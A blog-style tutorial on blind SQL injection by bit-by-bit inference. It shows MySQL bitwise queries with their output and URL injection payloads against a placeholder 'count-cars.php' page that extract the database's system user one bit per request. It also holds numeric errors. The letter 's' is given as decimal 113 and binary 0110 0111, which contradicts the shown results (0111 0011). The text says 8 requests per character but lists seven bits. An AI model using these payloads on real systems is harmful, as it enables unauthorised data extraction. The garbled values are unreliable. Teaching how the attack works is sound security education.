Blind SQL Injection # bit-by-bit Inference

On the last example we use binary search technique to get each character of the SYSTEM_USER by infering a grouped 8-bits(1 byte) through a selected requests.

Now you’ll use another technique when you’ve to select a single bit from a selected position on each request.

If you’ve as an example the character s which have a presentation in decimal of 11310 and in binary 0110 01112, to use bit-by-bit technique for this case, you’ve to use bitwise AND against a byte that has the most significant bit at some position, if the predicate returns true the bit is 1 otherwise the bit is 0.

Let’s start with the 8 requests for each significant bit set corresponding to 6410, 3210, 1610, 810, 410, 210 and 110.

mysql> SELECT ASCII('s') & 64 = 64;
+----------------------+
| ASCII('s') & 64 = 64 |
+----------------------+
|                    1 |
+----------------------+
mysql> SELECT ASCII('s') & 32 = 32;
+----------------------+
| ASCII('s') & 32 = 32 |
+----------------------+
|                    1 |
+----------------------+
mysql> SELECT ASCII('s') & 16 = 16;
+----------------------+
| ASCII('s') & 16 = 16 |
+----------------------+
|                    1 |
+----------------------+
mysql> SELECT ASCII('s') & 8 = 8;
+----------------------+
| ASCII('s') & 8 = 8   |
+----------------------+
|                    0 |
+----------------------+
mysql> SELECT ASCII('s') & 4 = 4;
+----------------------+
| ASCII('s') & 4 = 4   |
+----------------------+
|                    0 |
+----------------------+
mysql> SELECT ASCII('s') & 2 = 2;
+----------------------+
| ASCII('s') & 2 = 2   |
+----------------------+
|                    1 |
+----------------------+
mysql> SELECT ASCII('s') & 1 = 1; 
+----------------------+
| ASCII('s') & 1 = 1   |
+----------------------+
|                    1 |
+----------------------+

And that gives us a byte presentation of 0111 00112.

Let’s apply the same method to infer the value of the SYSTEM_USER which is an unknown value.

You start by checking the length of SYSTEM_USER which gives you an idea on the number of characters (number of positions to check):

LENGTH(SYSTEM_USER())

http://example.com/count-cars.php?car_name=Ford’ AND LENGTH(SYSTEM_USER()) = ’14

Then you get the ASCII presentation of the first character and you compare it against 6410:

ASCII(SUBSTRING(SYSTEM_USER(), 1,1)) & 64 = 64

http://example.com/count-cars.php?car_name=Ford’ AND ASCII(SUBSTRING(SYSTEM_USER(), 1,1)) %26 ’64’ = ’64

If the predicate is true the number of cars will be displayed, otherwise you’ll get the message Nothing to show.

You’ve to keep doing these requests, for each character(position) you’ve to do 8 requests starting from 6410 to 110, note that the length of the username is 14, which gives you a total of (14 positions * 8 requests) = 112 requests.

Leave a Reply

Your email address will not be published. Required fields are marked *